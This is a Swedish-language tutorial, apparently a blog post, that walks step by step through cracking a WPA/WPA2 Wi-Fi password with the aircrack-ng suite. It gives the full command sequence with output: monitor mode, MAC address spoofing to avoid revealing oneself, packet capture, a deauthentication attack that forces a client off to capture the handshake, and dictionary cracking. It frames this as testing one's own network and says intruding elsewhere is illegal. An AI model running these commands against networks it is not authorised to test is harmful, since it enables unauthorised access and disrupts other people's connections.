Crack WPA/WPA2 – Wordlist

Ska försöka visa hur man tar sig in i ett trådlöst nätverk som är skyddat med WPA eller WPA2. Metoden beskriver hur du får fram lösenordet på ditt egna nätverk därhemma med hjälp av en ordlista. Det är ett sätt för oss att kolla om metoden funkar eller ej. Tänk på att ordlistan måste så klart ha det aktuella lösenordet i sig.

Det är olagligt att bryta sig in i andras nätverk och jag rekommenderar absolut inte att du gör så. Jag visar endast här för att du ska veta hur det går till och på så sätt kunna skydda dig bättre.

Kommandona körs i terminalen som root användare. Det går klart också bra som sudo om du sitter i ubuntu.

Samtliga paket här under är bra om vi har tillgängliga till en början

I debian kan du installera dom med apt-get. Finns säkert i yum för Red Hat med, det är dock ingen kunskap jag besitter.
Själv använder jag dev versionen av aircrack-ng eftersom jag stött på en del problem dessförinnan.
Du kan hämta och installera dev versionen på följande vis

svn co http://trac.aircrack-ng.org/svn/trunk/aircrack-ng
cd aircrack-ng/
make && make install

Jag kommer här efter alltid illustrerar med två ruter efter varandra där den övre representerar input och den undre output.
Finns inte den undre rutan finns det häller inget output.

Vi börjar med att se över våra gränssnitt

airmon-ng
Interface    Chipset     Driver

wlan0        Atheros     ath9k - [phy0]

Vi startar en övervakning på wlan0 gränssnittet

airmon-ng start wlan0
Interface    Chipset     Driver

wlan0        Atheros     ath9k - [phy0]
                         (monitor mode enabled on mon0)
Vi tittar åter igen på våra gränssnitt
airmon-ng
Interface    Chipset     Driver

wlan0        Atheros     ath9k - [phy0]
mon0         Atheros     ath9k - [phy0]

Vi ser här vår övervakningskanal som vi ska använda.

Notera din MAC-adress

macchanger -s mon0
Permanent MAC: 38:4c:69:82:17:6b (Azurewave Technologies, Inc.)
Current   MAC: 38:4c:69:82:17:6b (Azurewave Technologies, Inc.)

Det är populärt att byta MAC-adressen istället för att notera den. Detta hjälper också så man inte visar något om sig själv.
Eftersom det inte går att byta MAC-adressen medan gränssnittet är aktivt så börjar vi med att stänga ner detta.

ifconfig mon0 down

Kommandot för att byta adressen

macchanger -m 00:11:22:33:44:55 mon0
Permanent MAC: 38:4c:69:82:17:6b (Azurewave Technologies, Inc.)
Current   MAC: 38:4c:69:82:17:6b (Azurewave Technologies, Inc.)
New       MAC: 00:11:22:33:44:55 (Cimsys Inc)

Nu startar vi gränssnittet igen.

ifconfig mon0 up

Då kan vi börja dumpa

airodump-ng mon0
CH 11 ][ Elapsed: 48 s ][ 2012-02-03 03:58 

BSSID              PWR  Beacons   #Data, #/s  CH  MB   ENC   CIPHER AUTH ESSID 

00:18:E7:FB:B0:52  -44      481     195    4  11  54e. WPA2  CCMP   PSK  foo-bar-baz-qux
64:16:F0:B4:1A:4D  -84      469       0    0  11  54e  WPA2  TKIP   PSK  TELE2INTERNET-2754
00:18:4D:93:05:B8  -84      472      57    0  11  54 . WPA   TKIP   PSK  malven

BSSID             STATION            PWR  Rate    Lost  Frames  Probe
(not associated)  00:1D:E0:58:01:C1  -85  0 - 1      0       4
(not associated)  04:46:65:80:BF:D1  -90  0 - 1      0       1
00:18:E7:FB:B0:52 38:4c:69:82:17:6b    0  0e- 0e   157     127

Du kan stoppa efter att du samlat in data i 15 – 30 sek med ctr+C.

Mitt nätverk här hemma heter ”foo-bar-baz-qux”. Denna ligger på kanal 11 med MAC-adressen: ”00:18:E7:FB:B0:52”. Jag vill nu filtrera ut så jag bara dumpar denna information. Jag vill dessutom spara dumpad data till en fil.
Flaggor:
-c står för channel/kanal.
-w står för write och tar som argument namnet på filen du vill dumpa till.
–bssid är ett filter, argumentet till denna är en MAC-adress.
–ivs gör att vi bara fångar upp IVs data.

airodump-ng -c 11 -w foo-bar.dump --bssid 00:18:E7:FB:B0:52 --ivs mon0
CH 11 ][ Elapsed: 10 s ][ 2012-02-03 04:16
BSSID              PWR  RXQ  Beacons   #Data, #/s  CH  MB    ENC   CIPHER  AUTH  ESSID

00:18:E7:FB:B0:52  -42  100      117      52    3  11  54e.  WPA2  CCMP    PSK   foo-bar-baz-qux

BSSID              STATION            PWR  Rate    Lost   Frames  Probe

00:18:E7:FB:B0:52  38:4C:69:82:17:6B    0  0e- 0e      0      22

Här är det viktigt vi får fram en station, dvs någon som är uppkopplad till nätverket. Det kan ta lite tid men borde ändå gå relativt fort förutsatt att det finns någon som är uppkopplad.

Vad vi vill göra nu när du hittat en station är att avbryta dess autentisering så att denna måste koppla upp sig igen. När detta händer så vill vi fånga upp handskakningen som görs.

Öppna ett nytt fönster medans du låter det förra snurra vidare.
kommandot  ”aireplay-ng” använder vi för att attackera uppkopplingen i det första fönstret.
Flaggor:
–deauth bestämmer hur många gånger vi ska av-autentisera anslutningen, det räcker med en gång.
-e är namnet på nätverket, dvs det namnet du finner i det första fönstret under kolumnen ”ESSID”
-c  Destinationens MAC-adress, dvs den du finner i det första föntret under kolumnen ”STATION” på 1:a raden.

aireplay-ng --deauth 1 -e foo-bar-baz-qux -c 38:4C:69:82:17:6B mon0
04:44:22 Waiting for beacon frame (ESSID: foo-bar-baz-qux) on channel 11
Found BSSID "00:18:E7:FB:B0:52" to given ESSID "foo-bar-baz-qux".
04:44:23 Sending 64 directed DeAuth. STMAC: [38:4C:69:82:17:6B] [ 0|64 ACKs]

Om du nu håller ögonen på det första fönstret igen så väntar vi här på en förändring. Vi vill att följande text ska dyka upp på första raden längst till höger.

WPA handshake: 00:18:E7:FB:B0:52

Det kan ta några sekunder men inte mer än så.

När detta lyckats så är det dax att cracka lösenordet. Som tidigare nämnt så ska vi här ha tillgång till en ordlista. Dom finns överallt över internet, men inte här.
Ordlistan ska vara separerad med radbrytning för varje ord. För testexemplet vi håller på med så kan du ju göra dig själv en tjänst och bara skapa en tom fil som heter wordlist.txt och där i fylla i lösenordet till ditt nätverk. Du slipper då vänta på hela processen i onödan. Nästkommande kommando kan nämligen ta väldigt lång tid. Tänk timme eller timmar, beroende på hur bra/lång ordlista du har fått tag i.

aircrack-ng -w wordlist.txt wpa2-foo-01.ivs
                    Aircrack-ng 1.1 r2060

           [00:00:24] 55304 keys tested (2299.04 k/s)

             KEY FOUND! [ lösenordet ]

Master Key    : BF DD E6 B9 BE 7C D4 F6 54 0E EE DE 33 4E E1 E6
                F0 F4 4D 9C 6F 48 EC 1D 42 7F B6 4E 07 2A 82 2A

Transient Key : 75 01 2B 70 E3 23 1F 2B D8 41 EB 1C EF E6 17 3E
                D5 4E 93 B0 18 B9 FD 52 51 32 E1 F4 41 4D 87 76
                31 93 77 EE DF A4 BF 57 68 65 08 76 13 99 73 40
                FC 85 F3 2A 04 77 09 BC 5C CB E7 1E 63 8E FA C7

EAPOL HMAC    : E5 C1 FC 9B 1C 57 DF D3 0F 77 CB 5E FC 1E F2 9D

Ovan ser du exemplet på ett lyckat resultat. Lösenordet i detta fallet var alltså ”lösenordet”.

Finns inte lösenordet i listan så hittar du självklart inte det.

Alla filer som skapades i processen ligger kvar och det är något du själv får städa undan.

Du kan nu också stänga av din övervakning med kommandot.

airmon-ng stop mon0
Interface    Chipset    Driver

wlan0        Atheros    ath9k - [phy0]
mon0         Atheros    ath9k - [phy0] (removed)

Synpunkter och råd till möjliga förbättringar uppskattas.